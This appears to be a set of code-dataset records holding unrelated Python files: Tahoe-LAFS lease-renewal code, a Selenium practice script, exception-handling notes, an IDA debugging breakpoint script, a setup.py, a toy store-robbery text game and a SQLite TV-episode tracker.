The list is in an arbitrary\n order and does not include duplicates if any nodes were visited more\n than once.\n \"\"\"\n storage_indexes = set()\n visit = storage_indexes.add\n d = visit_assets(visit)\n # Create some order now that we've ensured they're unique.\n d.addCallback(lambda ignored: list(storage_indexes))\n return d\n\n\n@inlineCallbacks\ndef renew_leases(\n visit_assets,\n storage_broker,\n secret_holder,\n min_lease_remaining,\n get_activity_observer,\n now,\n):\n \"\"\"\n Check the leases on a group of nodes for those which are expired or close\n to expiring and renew such leases.\n\n :param visit_assets: A one-argument callable which takes a visitor\n function and calls it with the storage index of every node to check.\n\n :param StorageFarmBroker storage_broker: A storage broker which can supply\n the storage servers where the nodes should be checked.\n\n :param SecretHolder secret_holder: The source of the renew secret for any\n leases which require renewal.\n\n :param timedelta min_lease_remaining: The minimum amount of time remaining\n to allow on a lease without renewing it.\n\n :param get_activity_observer: A no-argument callable which returns an\n ``ILeaseMaintenanceObserver``.\n\n :param now: A no-argument function returning the current time, as a\n datetime instance, for comparison against lease expiration time.\n\n :return Deferred: A Deferred which fires when all visitable nodes have\n been checked and any leases renewed which required it.\n \"\"\"\n activity = get_activity_observer()\n\n storage_indexes = yield iter_storage_indexes(visit_assets)\n\n renewal_secret = secret_holder.get_renewal_secret()\n servers = list(\n server.get_storage_server()\n for server\n in storage_broker.get_connected_servers()\n )\n\n for server in servers:\n # Consider parallelizing this.\n yield renew_leases_on_server(\n min_lease_remaining,\n renewal_secret,\n storage_indexes,\n server,\n activity,\n now(),\n )\n\n activity.finish()\n\n\n@inlineCallbacks\ndef renew_leases_on_server(\n min_lease_remaining,\n renewal_secret,\n storage_indexes,\n server,\n activity,\n now,\n):\n \"\"\"\n Check leases on the shares for the given storage indexes on the given\n storage server for those which are expired or close to expiring and renew\n such leases.\n\n :param timedelta min_lease_remaining: The minimum amount of time remaining\n to allow on a lease without renewing it.\n\n :param renewal_secret: A seed for the renewal secret hash calculation for\n any leases which need to be renewed.\n\n :param list[bytes] storage_indexes: The storage indexes to check.\n\n :param StorageServer server: The storage server on which to check.\n\n :param ILeaseMaintenanceObserver activity: An object which will receive\n events allowing it to observe the lease maintenance activity.\n\n :param datetime now: The current time for comparison against the least\n expiration time.\n\n :return Deferred: A Deferred which fires after all storage indexes have\n been checked and any leases that need renewal have been renewed.\n \"\"\"\n stats = yield server.stat_shares(storage_indexes)\n for storage_index, stat_dict in zip(storage_indexes, stats):\n if not stat_dict:\n # The server has no shares for this storage index.\n continue\n\n # Keep track of what's been seen.\n activity.observe([stat.size for stat in stat_dict.values()])\n\n # All shares have the same lease information.\n stat = stat_dict.popitem()[1]\n if needs_lease_renew(min_lease_remaining, stat, now):\n yield renew_lease(renewal_secret, storage_index, 
server)\n\n\ndef renew_lease(renewal_secret, storage_index, server):\n \"\"\"\n Renew the lease on the shares in one storage index on one server.\n\n :param renewal_secret: A seed for the renewal secret hash calculation for\n any leases which need to be renewed.\n\n :param bytes storage_index: The storage index to operate on.\n\n :param StorageServer server: The storage server to operate on.\n\n :return Deferred: A Deferred that fires when the lease has been renewed.\n \"\"\"\n # See allmydata/immutable/checker.py, _get_renewal_secret\n renew_secret = bucket_renewal_secret_hash(\n file_renewal_secret_hash(\n renewal_secret,\n storage_index,\n ),\n server.get_lease_seed(),\n )\n return server.renew_lease(\n storage_index,\n renew_secret,\n )\n\n\ndef needs_lease_renew(min_lease_remaining, stat, now):\n \"\"\"\n Determine if a lease needs renewal.\n\n :param timedelta min_lease_remaining: The minimum amount of time remaining\n to allow on a lease without renewing it.\n\n :param ShareStat stat: The metadata about a share to consider.\n\n :param datetime now: The current time for comparison against the lease\n expiration time.\n\n :return bool: ``True`` if the lease needs to be renewed, ``False``\n otherwise.\n \"\"\"\n remaining = datetime.utcfromtimestamp(stat.lease_expiration) - now\n return remaining < min_lease_remaining\n\n\n@attr.s\nclass _FuzzyTimerService(Service):\n \"\"\"\n A service to periodically, but not *too* periodically, run an operation.\n\n :ivar operation: A no-argument callable to fuzzy-periodically run. It may\n return a Deferred in which case the next run will not be scheduled\n until the Deferred fires.\n\n :ivar timedelta initial_interval: The amount of time to wait before the first\n run of the operation.\n\n :ivar sample_interval_distribution: A no-argument callable which returns a\n number of seconds as a float giving the amount of time to wait before\n the next run of the operation. It will be called each time the\n operation completes.\n\n :ivar IReactorTime reactor: A Twisted reactor to use to schedule runs of\n the operation.\n \"\"\"\n name = attr.ib()\n operation = attr.ib()\n initial_interval = attr.ib()\n sample_interval_distribution = attr.ib()\n reactor = attr.ib()\n\n def startService(self):\n Service.startService(self)\n self._call = self.reactor.callLater(\n self.initial_interval.total_seconds(),\n self._iterate,\n )\n\n def stopService(self):\n self._call.cancel()\n self._call = None\n return Service.stopService(self)\n\n def _iterate(self):\n \"\"\"\n Run the operation once and then schedule it to run again.\n \"\"\"\n d = maybeDeferred(self.operation)\n d.addErrback(err, \"Fuzzy timer service ({})\".format(self.name))\n d.addCallback(lambda ignored: self._schedule())\n\n def _schedule(self):\n \"\"\"\n Schedule the next run of the operation.\n \"\"\"\n self._call = self.reactor.callLater(\n self.sample_interval_distribution().total_seconds(),\n self._iterate,\n )\n\n\ndef lease_maintenance_service(\n maintain_leases,\n reactor,\n last_run_path,\n random,\n interval_mean=None,\n interval_range=None,\n):\n \"\"\"\n Get an ``IService`` which will maintain leases on ``root_node`` and any\n nodes directly or transitively reachable from it.\n\n :param IReactorClock reactor: A Twisted reactor for scheduling renewal\n activity.\n\n :param FilePath last_run_path: A path containing the time (as an ISO8601\n datetime string) at which lease maintenance last ran to inform an\n adjustment to the first interval before running it again. 
If no file\n exists at the path it is treated as though there has been no previous\n run. The path will also be rewritten on each run to update this\n value.\n\n :param random: An object like ``random.Random`` which can be used as a\n source of scheduling delay.\n\n :param timedelta interval_mean: The mean time between lease renewal checks.\n\n :param timedelta interval_range: The range of the uniform distribution of\n lease renewal checks (centered on ``interval_mean``).\n\n :param maintain_leases: A no-argument callable which performs a round of\n lease-maintenance. The resulting service calls this periodically.\n \"\"\"\n if interval_mean is None:\n interval_mean = timedelta(days=26)\n if interval_range is None:\n interval_range = timedelta(days=4)\n halfrange = interval_range / 2\n\n def sample_interval_distribution():\n return timedelta(\n seconds=random.uniform(\n (interval_mean - halfrange).total_seconds(),\n (interval_mean + halfrange).total_seconds(),\n ),\n )\n # Rather than an all-or-nothing last-run time we probably eventually want\n # to have a more comprehensive record of the state when we were last\n # interrupted. This would remove the unfortunate behavior of restarting\n # from the beginning if we shut down during a lease scan. Shutting down\n # during a lease scan becomes increasingly likely the more shares there\n # are to check.\n last_run = read_time_from_path(last_run_path)\n if last_run is None:\n initial_interval = sample_interval_distribution()\n else:\n initial_interval = calculate_initial_interval(\n sample_interval_distribution,\n last_run,\n datetime.utcfromtimestamp(reactor.seconds()),\n )\n initial_interval = max(\n initial_interval,\n timedelta(0),\n )\n\n\n return _FuzzyTimerService(\n SERVICE_NAME,\n lambda: bracket(\n lambda: None,\n lambda: write_time_to_path(\n last_run_path,\n datetime.utcfromtimestamp(reactor.seconds()),\n ),\n maintain_leases,\n ),\n initial_interval,\n sample_interval_distribution,\n reactor,\n )\n\n\ndef write_time_to_path(path, when):\n \"\"\"\n Write an ISO8601 datetime string to a file.\n\n :param FilePath path: The path to a file to which to write the datetime\n string.\n\n :param datetime when: The datetime to write.\n \"\"\"\n path.setContent(when.isoformat())\n\n\ndef read_time_from_path(path):\n \"\"\"\n Read an ISO8601 datetime string from a file.\n\n :param FilePath path: The path to a file containing a datetime string.\n\n :return: None if no file exists at the path. 
Otherwise, a datetime\n instance giving the time represented in the file.\n \"\"\"\n try:\n when = path.getContent()\n except IOError as e:\n if ENOENT == e.errno:\n return None\n raise\n else:\n return parse_datetime(when)\n\n\ndef visit_storage_indexes_from_root(visitor, get_root_nodes):\n \"\"\"\n An operation for ``lease_maintenance_service`` which applies the given\n visitor to ``root_node`` and all its children.\n\n :param visitor: A one-argument callable which takes the traversal function\n and which should call it as desired.\n\n :param get_root_nodes: A no-argument callable which returns a list of\n filesystem nodes (``IFilesystemNode``) at which traversal will begin.\n\n :return: A no-argument callable to perform the visits.\n \"\"\"\n return lambda: visitor(\n partial(\n visit_storage_indexes,\n # Make sure we call get_root_nodes each time to give us a chance\n # to notice when it changes.\n get_root_nodes(),\n ),\n )\n\n\n@implementer(ILeaseMaintenanceObserver)\nclass NoopMaintenanceObserver(object):\n \"\"\"\n A lease maintenance observer that does nothing.\n \"\"\"\n def observe(self, sizes):\n pass\n\n def finish(self):\n pass\n\n\n@implementer(ILeaseMaintenanceObserver)\n@attr.s\nclass MemoryMaintenanceObserver(object):\n \"\"\"\n A lease maintenance observer that records observations in memory.\n \"\"\"\n observed = attr.ib(default=attr.Factory(list))\n finished = attr.ib(default=False)\n\n def observe(self, sizes):\n self.observed.append(sizes)\n\n def finish(self):\n self.finished = True\n\n\ndef maintain_leases_from_root(\n get_root_nodes,\n storage_broker,\n secret_holder,\n min_lease_remaining,\n progress,\n get_now,\n):\n \"\"\"\n An operation for ``lease_maintenance_service`` which visits ``root_node``\n and all its children and renews their leases if they have\n ``min_lease_remaining`` or less on them.\n\n :param get_root_nodes: A no-argument callable which returns the list of\n Tahoe-LAFS filesystem nodes (``IFilesystemNode``) to use as the roots\n of the node hierarchies to be maintained.\n\n :param StorageFarmBroker storage_broker: The storage broker which can put\n us in touch with storage servers where shares of the nodes to maintain\n might be found.\n\n :param SecretHolder secret_holder: The Tahoe-LAFS client node secret\n holder which can give us the lease renewal secrets needed to renew\n leases.\n\n :param timedelta min_lease_remaining: The minimum amount of time remaining\n to allow on a lease without renewing it.\n\n :param get_now: A no-argument callable that returns the current time as a\n ``datetime`` instance.\n\n :return: A no-argument callable to perform the maintenance.\n \"\"\"\n def visitor(visit_assets):\n return renew_leases(\n visit_assets,\n storage_broker,\n secret_holder,\n min_lease_remaining,\n progress,\n get_now,\n )\n\n return visit_storage_indexes_from_root(\n visitor,\n get_root_nodes,\n )\n\n\ndef calculate_initial_interval(sample_interval_distribution, last_run, now):\n \"\"\"\n Determine how long to wait before performing an initial (for this process)\n scan for aging leases.\n\n :param sample_interval_distribution: See ``_FuzzyTimerService``.\n :param datetime last_run: The time of the last scan.\n :param datetime now: The current time.\n \"\"\"\n since_last_run = now - last_run\n initial_interval = sample_interval_distribution() - since_last_run\n return 
initial_interval\n","sub_path":"src/_zkapauthorizer/lease_maintenance.py","file_name":"lease_maintenance.py","file_ext":"py","file_size_in_byte":17427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"643768756","text":"# Definition for singly-linked list.\nclass ListNode:\n    def __init__(self, val=0, next=None):\n        self.val = val\n        self.next = next\n\ndef reverseList(head: ListNode) -> ListNode:\n    '''\n    1 -> 2 -> 3 -> 4 -> 5\n    '''\n    if head and head.next:\n        new_head = reverseList(head.next)\n        head.next.next = head\n        head.next = None\n        return new_head\n    else:\n        return head","sub_path":"recursion/reverse_linked_list.py","file_name":"reverse_linked_list.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"35223571","text":"import time\n\nfrom selenium import webdriver\n#\n# browser = webdriver.Chrome()\n# browser.maximize_window()\n# browser.get(\"http://www.baidu.com\")\n# time.sleep(5)\n# print(browser.page_source)\n# browser.close()\n# browser.quit()\nfrom selenium.common.exceptions import TimeoutException, NoSuchElementException\n\nbrowser = webdriver.Chrome()\nbrowser.get(\"http://www.taobao.com\")\ninput_first = browser.find_element_by_id(\"J_SiteNavLogin\")\ninput_second = browser.find_element_by_css_selector(\"#q\")\ninput_third = browser.find_element_by_xpath('//*[@id=\"q\"]')\nprint(input_first.text)\nprint(input_second.text)\nprint(input_third.text)\nbrowser.close()\nbrowser.quit()\n\n# back / forward navigation\nbrowser = webdriver.Chrome()\nbrowser.get('https://www.baidu.com/')\nbrowser.get('https://www.taobao.com/')\nbrowser.get('https://www.python.org/')\nbrowser.back()\ntime.sleep(1)\nbrowser.forward()\nbrowser.close()\nbrowser.quit()\n\n\nbrowser = webdriver.Chrome()\nbrowser.get('https://www.zhihu.com/explore')\nprint(browser.get_cookies())\nbrowser.add_cookie({'name': 'name', 'domain': 'www.zhihu.com', 'value': 'zhaofan'})\nprint(browser.get_cookies())\nbrowser.delete_all_cookies()\nprint(browser.get_cookies())\n\n\nbrowser = webdriver.Chrome()\nbrowser.get('https://www.baidu.com')\nbrowser.execute_script('window.open()')\nprint(browser.window_handles)\nbrowser.switch_to_window(browser.window_handles[1])\nbrowser.get('https://www.taobao.com')\ntime.sleep(1)\nbrowser.switch_to_window(browser.window_handles[0])\nbrowser.get('https://python.org')\n\nbrowser = webdriver.Chrome()\ntry:\n    browser.get('https://www.baidu.com')\nexcept TimeoutException:\n    print('Time Out')\ntry:\n    browser.find_element_by_id('hello')\nexcept NoSuchElementException:\n    print('No Element')\nfinally:\n    browser.close()\n\n","sub_path":"pachong/爬虫/Study/Selenium/study.py","file_name":"study.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"448535805","text":"import sys\n\n# First, the try clause (the statements between the try and except keywords) is executed.\n# If no exception occurs, the except clause is skipped and execution of the try statement is finished.\n# If an exception occurs while the try clause is executing, the rest of the clause is skipped.\n# If the exception's type matches the name after except, the matching except clause is executed, and execution then continues after the try statement.\n# If an exception matches none of the except clauses, it is passed on to any enclosing try statement.\nwhile True:\n    try:\n        x = int(input(\"Please enter a number: \"))\n        break\n    except ValueError:\n        print(\"Oops! That was no valid number. Try again \")
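\n\n# A further example (added here for illustration, in the spirit of these notes):\n# exceptions can also be triggered deliberately with the raise statement, and a\n# bare raise inside an except clause re-raises the active exception:\ntry:\n    raise NameError('HiThere')\nexcept NameError:\n    print('An exception flew by!')\n    raise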
\n\n# A try statement may have more than one except clause, to handle different specific exceptions. At most one handler will be executed.\ntry:\n    f = open('myfile.txt')\n    s = f.readline()\n    i = int(s.strip())\nexcept OSError as err:\n    print(\"OS error: {0}\".format(err))\nexcept ValueError:\n    print(\"Could not convert data to an integer.\")\nexcept:\n    print(\"Unexpected error:\", sys.exc_info()[0])\n    raise\n# The last except clause may omit the exception name, in which case it acts as a wildcard. You can use it to print an error message and then re-raise the exception.\n\n# An except clause may handle several exceptions at once by naming them in a parenthesized tuple:\ntry:\n    pass\nexcept (RuntimeError, TypeError, NameError):\n    pass\n\n# The try ... except statement has an optional else clause which, when used, must be placed after all except clauses.\n# The else clause runs when the try clause does not raise any exception.\nfor arg in sys.argv[1:]:\n    try:\n        f = open(arg, 'r')\n    except IOError:\n        print('cannot open', arg)\n    else:\n        print(arg, 'has', len(f.readlines()), 'lines')\n        f.close()\n\n# The try statement has one more optional clause, finally, which defines clean-up actions that are executed under all circumstances.\ntry:\n    raise KeyboardInterrupt\nfinally:\n    print('Goodbye, world!')\n\n\ndef divide(x, y):\n    try:\n        result = x / y\n    except ZeroDivisionError:\n        print(\"division by zero!\")\n    else:\n        print(\"result is\", result)\n    finally:\n        print(\"executing finally clause\")\n\n\n# The with statement guarantees that objects such as files are always cleaned up correctly after use:\nwith open(\"myfile.txt\") as f:\n    for line in f:\n        print(line, end=\"\")\n","sub_path":"python/learn-note/grammar foundation/07_错误和异常.py","file_name":"07_错误和异常.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"584694345","text":"'''\r\nint __cdecl builtin_exec(_object *self, _object *args)\r\n'''\r\nargs_ea = idc.GetRegValue('rdx') if IS_64BIT else get_addr_by_ptr(str2ea('esp + 8'))\r\nif args_ea != idaapi.BADADDR:\r\n\targs = pyTupleObject_to_plist(args_ea)\r\n\tprint >> P_OUT, '#builtin_exec -> args count {}'.format(len(args))\r\n\tif args:\r\n\t\tif get_obj_type(args[0]) in ['PyString', 'PyUnicodeString']:\r\n\t\t\tprint >> P_OUT, pyStringObject_to_string(args[0])\r\n\tprint >> P_OUT, '-' * 50 + '\\n'\r\n\tprint >> P_OUT, call_trace(8)\r\n\treturn True\r\nreturn False","sub_path":"IPH/3.4/break_condition_builtin_exec.py","file_name":"break_condition_builtin_exec.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"243812973","text":"#!/usr/bin/env python3\r\n\"\"\"aioesphomeapi setup script.\"\"\"\r\nfrom setuptools import find_packages, setup\r\n\r\nVERSION = '2.6.1'\r\nPROJECT_NAME = 'aioesphomeapi'\r\nPROJECT_PACKAGE_NAME = 'aioesphomeapi'\r\nPROJECT_LICENSE = 'MIT'\r\nPROJECT_AUTHOR = 'Otto Winter'\r\nPROJECT_COPYRIGHT = ' 2019, Otto Winter'\r\nPROJECT_URL = 'https://esphome.io/'\r\nPROJECT_EMAIL = 'contact@otto-winter.com'\r\n\r\nPROJECT_GITHUB_USERNAME = 'esphome'\r\nPROJECT_GITHUB_REPOSITORY = 'aioesphomeapi'\r\n\r\nPYPI_URL = 'https://pypi.python.org/pypi/{}'.format(PROJECT_PACKAGE_NAME)\r\nGITHUB_PATH = '{}/{}'.format(PROJECT_GITHUB_USERNAME, PROJECT_GITHUB_REPOSITORY)\r\nGITHUB_URL = 'https://github.com/{}'.format(GITHUB_PATH)\r\n\r\nDOWNLOAD_URL = '{}/archive/{}.zip'.format(GITHUB_URL, VERSION)\r\n\r\nREQUIRES = [\r\n    'attrs',\r\n    # Pin protobuf version to 3.6.1, 3.7 is slightly incompatible with the generated\r\n    # api_pb2.py. 
We could upgrade to 3.7, but that breaks HA installs because\r\n    # image_processing.tensorflow pins protobuf to 3.6.1\r\n    'protobuf==3.6.1',\r\n    'zeroconf>=0.21.3',\r\n]\r\n\r\nsetup(\r\n    name=PROJECT_PACKAGE_NAME,\r\n    version=VERSION,\r\n    url=PROJECT_URL,\r\n    download_url=DOWNLOAD_URL,\r\n    author=PROJECT_AUTHOR,\r\n    author_email=PROJECT_EMAIL,\r\n    packages=find_packages(),\r\n    include_package_data=True,\r\n    zip_safe=False,\r\n    install_requires=REQUIRES,\r\n    python_requires='>=3.5.3',\r\n)\r\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"394454355","text":"import time\n# Draws a space\ndef Spacing():\n    Spaces = [' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' '] \n    for SpaceList in Spaces:\n        print(SpaceList)\n\n# Draws a line\ndef Line():\n    print('------------------------')\n\n#Draws a yes no question\ndef YesOrNo():\n    yesno = ['1. yes' , '2. no']\n    for yesnoList in yesno:\n        print(yesnoList)\ndef initiate():\n    InitRobberyStr = ['INITIATING ROBBERY...', 'INITIATING ROBBERY...', 'INITIATING ROBBERY...']\n    for InitRobberyList in InitRobberyStr:\n        Line()\n        print('INITIATING ROBBERY...')\n        time.sleep(2)\n\n\n# Mother function of all functions (experimenting with scope issues)\ndef execRobbery():\n    Line()\n    #Lists potential robbery locations\n    print('Locations: ')\n    Locations = ['1. H&M' , '2. Louis Vuitton' , '3. Apple' , '4. Blue Mercury' ]\n    for LocationList in Locations:\n        print(LocationList)\n    Line()\n    \n# Lets user choose location\n    SelectedLocation = input('Where would you like to rob? : ')\n    if SelectedLocation == '1':\n        SelectedLocationName = 'H&M'\n        SecurityLevel = 1\n    elif SelectedLocation == '2':\n        SelectedLocationName = 'Louis Vuitton'\n        SecurityLevel = 3\n    elif SelectedLocation == '3':\n        SelectedLocationName = 'Apple'\n        SecurityLevel = 4\n    elif SelectedLocation == '4':\n        SelectedLocationName = 'Blue Mercury'\n        SecurityLevel = 2\n    else:\n        Line()\n        print('ERROR: Please enter a number from 1 to 4')\n        Line()\n        SelectedLocation = input('Where would you like to rob? : ')\n        if SelectedLocation == '1':\n            SelectedLocationName = 'H&M'\n            SecurityLevel = 1\n            Line()\n        elif SelectedLocation == '2':\n            SelectedLocationName = 'Louis Vuitton'\n            SecurityLevel = 3\n            Line()\n        elif SelectedLocation == '3':\n            SelectedLocationName = 'Apple'\n            SecurityLevel = 4\n            Line()\n        elif SelectedLocation == '4':\n            SelectedLocationName = 'Blue Mercury'\n            SecurityLevel = 2\n            Line()\n        else:\n            Line()\n            print('ERROR: Please restart program')\n            Line()\n    \n    print('Ok, you would like to rob ' + SelectedLocationName)\n    Line()\n# Lists Equipment Packages\n    print('Equipment Packages: ')\n    EquipmentPackage = ['1. Amateur Shoplifter - $50' , '2. Professional Thief - $1500' , '3. Armed Mercenary - $7500']\n    for EquipmentPackageList in EquipmentPackage:\n        print(EquipmentPackageList)\n    Line()\n# Asks user to select an Equipment Package\n    SelectedPackage = input('What Equipment Package would you like? : ')\n    if SelectedPackage == '1':\n        EquipmentType = 'Amateur Shoplifter'\n        Control = 1\n        Line()\n    elif SelectedPackage == '2':\n        EquipmentType = 'Professional Thief'\n        Control = 2\n        Line()\n    elif SelectedPackage == '3':\n        EquipmentType = 'Armed Mercenary'\n        Control = 3\n        Line()\n    else:\n        Line()\n        print('ERROR: Please enter a number from 1 to 3')\n        Line()\n        SelectedPackage = input('What Equipment Package would you like? : ')
\n        if SelectedPackage == '1':\n            EquipmentType = 'Amateur Shoplifter'\n            Control = 1\n            Line()\n        elif SelectedPackage == '2':\n            EquipmentType = 'Professional Thief'\n            Control = 2\n            Line()\n        elif SelectedPackage == '3':\n            EquipmentType = 'Armed Mercenary'\n            Control = 3\n            Line()\n        else:\n            Line()\n            print('ERROR: Restart Program')\n            Line()\n    print('Ok, ' + EquipmentType)\n    Line()\n#Initiates the Robbery\n    initiate = input('Would you like to initiate the robbery?: ')\n    \n    print(' ')\n    print('ROBBERY INITIATED')\n    Line()\n#Displays initial Police ETA\n    InitialPrTime = (Control/SecurityLevel)**2\n    print('POLICE ETA : ' + str(InitialPrTime) + ' minutes')\n    Line()\n#Lists potential items based on the store\n    print('Potential items to steal from ' + SelectedLocationName + \" : \")\n    if SelectedLocation == '1':\n        Items = ['1. Sweatshirt - $25' , '2. Jeans - $40', '3. Perfume - $60']\n        for ItemList in Items:\n            print(ItemList)\n    elif SelectedLocation == '2':\n        Items = ['1. Wallet - $115' , '2. Handbag - $225' , '3. Watch - $950']\n        for ItemList in Items:\n            print(ItemList)\n    elif SelectedLocation == '3':\n        Items = ['1. Airpods - $120' , '2. iPhone XS Max - $1250' , '3. MacPro - $10,000']\n        for ItemList in Items:\n            print(ItemList)\n    elif SelectedLocation == '4':\n        Items = ['1. Eyeshadow - $20' , '2. b&b Hair Soap - $45' , '3. Lamer Lotion - $99']\n        for ItemList in Items:\n            print(ItemList) \n    else:\n        print('ERROR')\n    \n    Line()\n#Allows the user to select the first item to steal\n    FirstItem = input('What is the first item(s) you would like to steal? : ')\n    if SelectedLocation == '1':\n        if FirstItem == '1':\n            FirstItemPrice = 25\n            FirstItemName = 'Sweatshirt'\n        elif FirstItem == '2':\n            FirstItemPrice = 40\n            FirstItemName = 'Jeans'\n        elif FirstItem == '3':\n            FirstItemPrice = 60\n            FirstItemName = 'Perfume'\n        else:\n            print('ERROR')\n    elif SelectedLocation == '2':\n        if FirstItem == '1':\n            FirstItemPrice = 115\n            FirstItemName = 'Wallet'\n        elif FirstItem == '2':\n            FirstItemPrice = 225\n            FirstItemName = \"Handbag\"\n        elif FirstItem == '3':\n            FirstItemPrice = 950\n            FirstItemName = 'Watch'\n        else:\n            print('ERROR')\n    elif SelectedLocation == '3':\n        if FirstItem == '1':\n            FirstItemPrice = 120\n            FirstItemName = 'Airpod'\n        elif FirstItem == '2':\n            FirstItemPrice = 1250\n            FirstItemName = 'iPhone XS Max'\n        elif FirstItem == '3':\n            FirstItemPrice = 10000\n            FirstItemName = 'Mac Pro Desktop'\n        else:\n            print('ERROR')\n    elif SelectedLocation == '4':\n        if FirstItem == '1':\n            FirstItemPrice = 20\n            FirstItemName = 'Eyeshadow'\n        elif FirstItem == '2':\n            FirstItemPrice = 45\n            FirstItemName = 'b&b Hair Soap'\n        elif FirstItem == '3':\n            FirstItemPrice = 99\n            FirstItemName = 'Lamer Lotion'\n        else: \n            print('ERROR')\n    Line()\n    FirstItemQuantity = input('How many: ')\n    Line()\n    #Changes the item name based on how many stolen\n    if int(FirstItemQuantity) > 1:\n        FirstItemName = FirstItemName + 's'\n    else:\n        FirstItemName = '1 ' + FirstItemName\n    #calculates police response time after first steal\n    FirstStealValue = int(FirstItemQuantity) * FirstItemPrice\n    PrTime = float(InitialPrTime) - (float(FirstStealValue)**(1/Control)*0.0001)\n    print('Initial=' + str(InitialPrTime))\n    print('First steal=' + str(FirstStealValue))\n    print('Prtime=' + str(PrTime))\n    #tries to steal item\n    print('Attempting to steal ' + FirstItemQuantity + ' ' + FirstItemName + '...')\n    time.sleep(2)\n    if PrTime <= 0:\n        RobberyTwoStatus = 'failure'\n        print('failure')\n    else:\n        print('robbery Two success')\n    #mission failed message\n    #\n    print() \n#Allows the user to select the second item to steal\n
\n#Uses equipment type and item stolen to calculate police response time\n\nexecRobbery()\n\n \n \n","sub_path":"robberynew.py","file_name":"robberynew.py","file_ext":"py","file_size_in_byte":7465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"120057438","text":"import sqlite3\n\nfrom episode import Episode\nfrom episode_state import EpisodeState\nfrom tvshow import TVShow\n\n\nclass ExistsError(AttributeError):\n \"\"\"\n Raised when a tv show or an episode already exists in the database and\n someone tries to add it again\n \"\"\"\n pass\n\n\nclass NotFoundError(AttributeError):\n \"\"\"\n Raised when trying to access to an episode or tv show that does not exist\n in the database.\n \"\"\"\n\n\nclass Database:\n\n tables_script = \"\"\"\n CREATE TABLE IF NOT EXISTS show (\n id INT NOT NULL,\n name TEXT NOT NULL,\n\n PRIMARY KEY (name)\n );\n\n CREATE TABLE IF NOT EXISTS episode (\n tvshow_name TEXT NOT NULL,\n season INT NOT NULL,\n number INT NOT NULL,\n hd INT NOT NULL,\n link TEXT NOT NULL,\n\n FOREIGN KEY(tvshow_name) REFERENCES show(name) ON DELETE CASCADE,\n PRIMARY KEY (tvshow_name, season, number)\n );\n\n CREATE TABLE IF NOT EXISTS downloading (\n tvshow_name TEXT NOT NULL,\n season INT NOT NULL,\n number INT NOT NULL,\n\n FOREIGN KEY(tvshow_name, season, number)\n REFERENCES episode(tvshow_name, season, number)\n ON DELETE CASCADE,\n\n PRIMARY KEY (tvshow_name, season, number)\n );\n\n CREATE TABLE IF NOT EXISTS downloaded (\n tvshow_name TEXT NOT NULL,\n season INT NOT NULL,\n number INT NOT NULL,\n\n FOREIGN KEY(tvshow_name, season, number)\n REFERENCES episode(tvshow_name, season, number)\n ON DELETE CASCADE,\n\n PRIMARY KEY (tvshow_name, season, number)\n );\n\n CREATE TABLE IF NOT EXISTS stored (\n tvshow_name TEXT NOT NULL,\n season INT NOT NULL,\n number INT NOT NULL,\n\n FOREIGN KEY(tvshow_name, season, number)\n REFERENCES episode(tvshow_name, season, number)\n ON DELETE CASCADE,\n\n PRIMARY KEY (tvshow_name, season, number)\n );\n\n \"\"\"\n\n def __init__(self, db_file: str):\n self.connection = sqlite3.connect(db_file)\n\n # enable foreign keys support\n self.connection.execute('pragma foreign_keys=ON')\n # use a row factory to return the query results\n # this allows to access each row of the result by name\n self.connection.row_factory = sqlite3.Row\n\n # create the database schema if it is not already created\n self.connection.cursor().executescript(self.tables_script)\n\n def put_tvshow(self, tvshow: TVShow):\n \"\"\"\n Puts a new tv show in the database. 
If the tv show already exists in\n the database an ExistsError is raised.\n\n :param tvshow: tv show to put in the database.\n \"\"\"\n try:\n self.connection.cursor().execute(\n 'INSERT INTO show (id, name) VALUES (?, ?)',\n (tvshow.id, tvshow.name)\n )\n self.connection.commit()\n except sqlite3.IntegrityError:\n raise ExistsError(\n \"tv show '%s' already exists in the database\" % tvshow)\n\n def remove_tvshow(self, tvshow_id: int):\n pass\n\n def tvshows(self) -> list:\n \"\"\"\n Returns a list with all the tv shows in the database.\n :return: list with all the tv shows in the database.\n \"\"\"\n cursor = self.connection.cursor()\n cursor.execute('SELECT name, id FROM show')\n\n item = cursor.fetchone()\n while item:\n # noinspection PyTypeChecker\n yield TVShow(item['id'], item['name'])\n item = cursor.fetchone()\n\n def put_episode(self, episode: Episode):\n try:\n self.connection.cursor().execute(\n 'INSERT INTO episode VALUES (?, ?, ?, ?, ?)',\n (episode.tvshow_name, episode.season, episode.number,\n episode.hd, episode.link)\n )\n self.connection.commit()\n except sqlite3.IntegrityError:\n raise ExistsError(\n \"episode '%s' already exists in the database\" % episode)\n\n def set_state(self, episode: Episode, state: EpisodeState):\n try:\n # remove from all state tables\n for state_table in EpisodeState.__members__.values():\n self.connection.cursor().execute(\n 'DELETE FROM ' + str(state_table) + ' '\n 'WHERE tvshow_name = ? AND season = ? AND number = ?',\n (episode.tvshow_name, episode.season, episode.number)\n )\n\n self.connection.cursor().execute(\n 'INSERT INTO ' + str(state) + ' VALUES (?, ?, ?)',\n (episode.tvshow_name, episode.season, episode.number)\n )\n\n self.connection.commit()\n\n except sqlite3.IntegrityError:\n raise NotFoundError(\"episode '%s' does no exist\" % episode)\n\n def episodes(self, state: EpisodeState = None):\n \"\"\"\n Iterates through the episodes with the given state. If state is None\n (default) then iterates through all episodes.\n\n :param state: state of the episodes to be returned.\n :return: list with the episode with the given state.\n \"\"\"\n\n if state:\n cursor = self._state_episodes(state)\n else:\n cursor = self._all_episodes()\n\n item = cursor.fetchone()\n while item:\n # noinspection 